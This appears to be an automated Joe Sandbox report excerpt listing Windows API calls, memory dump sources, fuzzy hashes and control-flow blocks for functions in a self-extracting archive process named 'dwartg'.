• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: FreeLibrary
• String ID: api-ms-
• API String ID: 3664257935-2084034818
• Opcode ID: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
• Instruction ID: 66293837ffbdd4c5feff7a2beaadf5f5e1e23625a8acd709d41ff33465036034
• Opcode Fuzzy Hash: 2653a9a765f6328204bbf8a3e85ed57f778dc9b24e958d2c05fe04294005188d
• Instruction Fuzzy Hash: 0C110A71A44724ABDB228B589C41B997764EF017B1F214210E919FB1D0E778EF00C6D5
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
  • Part of subcall function 0073081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00730836
  • Part of subcall function 0073081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0072F2D8,Crypt32.dll,00000000,0072F35C,?,?,0072F33E,?,?,?), ref: 00730858
• OleInitialize.OLE32(00000000), ref: 0073AC2F
• GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0073AC66
• SHGetMalloc.SHELL32(00768438), ref: 0073AC70
Strings
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
• String ID: riched20.dll$3To
• API String ID: 3498096277-2168385784
• Opcode ID: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
• Instruction ID: e4302c4fcd413434adc3b52dea4dfb802fc5bf0eb7adf3e60b0f7d47a2ea3927
• Opcode Fuzzy Hash: 2abe9e05f05de65359147c48421083286c1f13900ef115c357a9521378b10b3a
• Instruction Fuzzy Hash: 9EF06DB1D40249ABCB10AFA9D8499EFFFFCEF84B00F10411AE801E2241CBB856058FA1
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• CreateFileW.KERNELBASE(?,?,?,00000000,00000003,08000000,00000000,?,00000000,?,?,00727760,?,00000005,?,00000011), ref: 0072995F
• GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0072996C
• CreateFileW.KERNEL32(00000000,?,?,00000000,00000003,08000000,00000000,?,?,00000800,?,?,00727760,?,00000005,?), ref: 007299A2
• GetLastError.KERNEL32(?,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299AA
• SetFileTime.KERNEL32(00000000,00000000,000000FF,00000000,?,00727760,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 007299F9
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: File$CreateErrorLast$Time
• String ID:
• API String ID: 1999340476-0
• Opcode ID: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
• Instruction ID: 1b6f19a3c46cc2595d0c2fb992b1259eaab68bdd6ee7cbe26e97a77fe32fab3f
• Opcode Fuzzy Hash: 6e3dffcdd9de6cb753195ea42f7c702bc02213b335ffbf5e42fdc27cebbe278a
• Instruction Fuzzy Hash: 66314730544351AFE7309F20DC4ABDABB94BB84330F180B1DF6E5961D1D3B8A994CB95
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
APIs
• PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0073B579
• GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0073B58A
• IsDialogMessageW.USER32(000104AA,?), ref: 0073B59E
• TranslateMessage.USER32(?), ref: 0073B5AC
• DispatchMessageW.USER32(?), ref: 0073B5B6
Memory Dump Source
• Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
• Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
Similarity
• API ID: Message$DialogDispatchPeekTranslate
• String ID:
• API String ID: 1266772231-0
• Opcode ID: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
• Instruction ID: 34fbeba6c67362867dedf975606f2b57194c11b039f836d05e6573a69e36e2ab
• Opcode Fuzzy Hash: 719772fe7522df0184c6722797f249c76d3f35e56f63acd45af95883cc865b80
• Instruction Fuzzy Hash: 0CF0BD71A4121AABDB209BE5DC4CDDB7FACEE056917008515B905D2011EB7CD605CBB5
Uniqueness
Uniqueness Score: -1.00%
Control-flow Graph
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0073ABC2
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0073ABF9
                                                                                                • Part of subcall function 00731FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0072C116,00000000,.exe,?,?,00000800,?,?,?,00738E3C), ref: 00731FD1
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0073ABE9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with address range, called functions, and successor blocks)

• 1073 73dbde-73dc09 call 73ec50 SetEnvironmentVariableW call 730371 -> 1077
• 1077 73dc0e-73dc12 -> 1078, 1079
• 1078 73dc36-73dc38 (exit)
• 1079 73dc14-73dc18 -> 1080
• 1080 73dc21-73dc28 call 73048d -> 1083, 1084
• 1083 73dc1a-73dc20 -> 1080
• 1084 73dc2a-73dc30 SetEnvironmentVariableW -> 1078
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0073DBF4
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0073DC30
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

Control-flow Graph (basic blocks with address range, called functions, and successor blocks)

• 1085 729785-729791 -> 1086, 1087
• 1086 729793-72979b GetStdHandle -> 1087
• 1087 72979e-7297b5 ReadFile -> 1088, 1089
• 1088 729811 -> 1090
• 1089 7297b7-7297c0 call 7298bc -> 1093, 1094
• 1090 729814-729817 (exit)
• 1093 7297c2-7297ca -> 1094, 1095
• 1094 7297d9-7297dd -> 1096, 1097
• 1095 7297cc -> 1098
• 1096 7297ee-7297f2 -> 1100, 1101
• 1097 7297df-7297e8 GetLastError -> 1096, 1099
• 1098 7297cd-7297d7 call 729785 -> 1090
• 1099 7297ea-7297ec -> 1090
• 1100 7297f4-7297fc -> 1101, 1103
• 1101 72980c-72980f -> 1090
• 1103 7297fe-729807 GetLastError -> 1101, 1105
• 1105 729809-72980a -> 1098
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00729795
                                                                                              • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 007297AD
                                                                                              • GetLastError.KERNEL32 ref: 007297DF
                                                                                              • GetLastError.KERNEL32 ref: 007297FE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00743F73,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue), ref: 0074AD66
                                                                                              • GetLastError.KERNEL32(?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000,00000364,?,007498B7), ref: 0074AD72
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0074ACDB,00743F73,00000000,00000000,00000000,?,0074AED8,00000006,FlsSetValue,00757970,FlsSetValue,00000000), ref: 0074AD80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 007497E5: GetLastError.KERNEL32(?,00761030,00744674,00761030,?,?,00743F73,00000050,?,00761030,00000200), ref: 007497E9
                                                                                                • Part of subcall function 007497E5: _free.LIBCMT ref: 0074981C
                                                                                                • Part of subcall function 007497E5: SetLastError.KERNEL32(00000000,?,00761030,00000200), ref: 0074985D
                                                                                                • Part of subcall function 007497E5: _abort.LIBCMT ref: 00749863
                                                                                                • Part of subcall function 0074BB4E: _abort.LIBCMT ref: 0074BB80
                                                                                                • Part of subcall function 0074BB4E: _free.LIBCMT ref: 0074BBB4
                                                                                                • Part of subcall function 0074B7BB: GetOEMCP.KERNEL32(00000000,?,?,0074BA44,?), ref: 0074B7E6
                                                                                              • _free.LIBCMT ref: 0074BA9F
                                                                                              • _free.LIBCMT ref: 0074BAD5
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorLast_abort
                                                                                              • String ID: pu
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 2s$PDu<s
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E51F
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: (s$PDu<s
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,?,?,?,0072D343,00000001,?,?,?,00000000,0073551D,?,?,?), ref: 00729F9E
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,0073551D,?,?,?,?,?,00734FC7,?), ref: 00729FE5
                                                                                              • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,0072D343,00000001,?,?), ref: 0072A011
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              • Associated: 00000004.00000002.1629274806.0000000000720000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629415868.0000000000753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.000000000075E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000765000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629434369.0000000000782000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                              • Associated: 00000004.00000002.1629491530.0000000000783000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 0072C27E: _wcslen.LIBCMT ref: 0072C284
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A2D9
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A30C
                                                                                              • GetLastError.KERNEL32(?,?,?,?,0072A175,?,00000001,00000000,?,?), ref: 0072A329
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2260680371-0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0074B8B8
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 0074AFDD
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0074A56F), ref: 0074AF55
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0073E1E3
                                                                                                • Part of subcall function 0073E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0073E8D0
                                                                                                • Part of subcall function 0073E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0073E8E1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.1629296712.0000000000721000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00720000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_720000_dwartg.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: s
                                                                                              • API String ID: 1269201914-1424750476
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
